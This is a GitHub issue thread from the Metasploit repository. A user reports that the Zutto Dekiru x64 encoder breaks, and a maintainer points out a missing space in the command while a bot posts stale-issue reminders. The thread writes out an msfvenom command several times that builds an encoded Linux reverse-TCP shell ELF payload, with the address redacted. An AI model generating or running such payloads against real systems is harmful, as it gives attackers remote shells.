metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Is there an error with Zutto Dekiru encoder?

Open shellchocolat opened this issue 2 years ago • 1 comments

Summary

I tried to use Zutto Dekiru encoder (x64), but it seems not to work correctly because the FXSAVE/FXSAVE64 doesn't save the FPU environnment as well as FNSTENV does on Shikata Ga Nai encoder (x86), so the POP instruction doesn't get a relative address to the shellcode's position leading to an access denied when XOR with the key.

Relevant information

The command used to generate the payload is:

msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.binLHOST=xxx.xxx.xxx.xxx LPORT=xxxx

The permission of the section is RWX, so the error is not from here.

shellchocolat avatar Oct 14 '22 12:10 shellchocolat

msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.binLHOST=xxx.xxx.xxx.xxx LPORT=xxxx <- Is this the command you ran? Looks like your missing a space between the options and -o t.bin.

gwillcox-r7 avatar Oct 17 '22 21:10 gwillcox-r7

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Nov 17 '22 15:11 github-actions[bot]

@shellchocolat Were you able to get this to work using the command msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.bin LHOST=xxx.xxx.xxx.xxx LPORT=xxxx?

gwillcox-r7 avatar Nov 17 '22 19:11 gwillcox-r7

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Dec 19 '22 15:12 github-actions[bot]